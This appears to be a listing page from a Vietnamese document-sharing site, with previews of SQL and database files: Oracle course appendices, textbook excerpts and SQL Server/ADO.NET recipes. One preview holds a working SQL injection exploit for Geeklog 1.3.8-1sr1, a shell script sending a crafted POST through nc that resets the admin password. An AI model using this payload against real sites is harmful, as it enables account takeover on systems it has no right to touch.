Used by sql
-
Built-In Database Objects In addition to creating the database files, several other structures are created. Data dictionary: Contains descriptions of the objects in the database Dynamic performance tables: Contains information used by the database administrator (DBA) to monitor and tune the database and instance PL/SQL packages: Program units adding functionality to the database. These packages are created when the catproc.sql script is run after the CREATE DATABASE command. PL/SQL packages will not be discussed within the scope of this course.
20p trinh02 28-01-2013 63 4 Download
-
After completing this appendix, you should be able to do the following: Describe the types of problems that are solved by using SQL to generate SQL Write a script that generates a script of DROP TABLE statements Write a script that generates a script of INSERT INTO statements
14p trinh02 28-01-2013 48 5 Download
-
Sql Injection Exploit Code hack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80 This should change the Admin user's password to "new". You have to change the /path/to/gl/users.
2p tt1991tt 20-02-2011 239 68 Download
-
Database Systems: The Complete Book- P13: Database Systems and Database Design and Application courses offered at the junior, senior and graduate levels in Computer Science departments. Written by well-known computer scientists, this introduction to database systems offers a comprehensive approach, focusing on database design, database use, and implementation of database applications and database management systems
19p baby246 18-08-2010 81 6 Download
-
Database Systems: The Complete Book- P12: Database Systems and Database Design and Application courses offered at the junior, senior and graduate levels in Computer Science departments. Written by well-known computer scientists, this introduction to database systems offers a comprehensive approach, focusing on database design, database use, and implementation of database applications and database management systems
20p baby246 18-08-2010 70 6 Download
-
Kết quả lấy từ SQL Server bằng cách sử dụng các đối tượng DataTable Người đọc dữ liệu là rất tốt khi bạn chỉ muốn tải dữ liệu vào một ListBox ComboBox hoặc kiểm soát bằng tay, nhưng bạn có thể tiết kiệm một số mã hóa bằng cách ràng buộc các điều khiển ListBox để một bảng dữ liệu ở thời gian chạy
3p luvpro 06-08-2010 69 5 Download
-
Thực hiện một SQL Server lưu trữ Thủ tục Bởi Sử dụng ActiveX Data Objects Nếu bạn đang làm một phát triển ADO với máy chủ của khách hàng đối với hậu phương, sau đó bạn có thể gọi thủ tục lưu trữ.
2p luvpro 06-08-2010 86 3 Download
-
[ Team LiB ] Recipe 8.11 Using a Single Stored Procedure to Update Multiple Changes to a SQL Server Database Problem You need to update a SQL Server 2000 database with changes to multiple rows in a DataSet by executing a single stored procedure.
7p luvpro 04-08-2010 159 20 Download
-
[ Team LiB ] Recipe 10.9 Getting a SQL Server Query Plan Problem You need to retrieve information about how query statements are executed by the SQL Server. Solution Use the SET SHOWPLAN_TEXT statement. The sample code executes the SET SHOWPLAN_TEXT statement
3p luvpro 04-08-2010 125 8 Download
-
[ Team LiB ] Recipe 3.13 Executing Queries That Use COMPUTE BY Problem The SQL Server .NET data provider does not support the COMPUTE BY clause but you want to execute a COMPUTE BY statement using ADO.NET.
2p luvpro 04-08-2010 96 3 Download
-
Step 3: Set the CommandText Property of the SqlCommand Object You use SQL to work with the information stored in a database. SQL is an industry standard language supported by SQL Server, Access, and Oracle
5p daisuphu 29-07-2010 79 7 Download
-
Critical Database Concepts new features include “invisible” indexes, simplified table maintenance, and editioned objects. You should evaluate your previous architecture decisions in light of the new features available. In the next several chapters, you will see how to install Oracle Database 11g and how to upgrade to Oracle Database 11g from prior releases. Following those chapters, you will see an overview of application planning, followed by many chapters on the use of SQL, PL/SQL, Java, object-oriented features, and XML to get the most out of your Oracle database.
10p vongsuiphat 04-01-2010 117 15 Download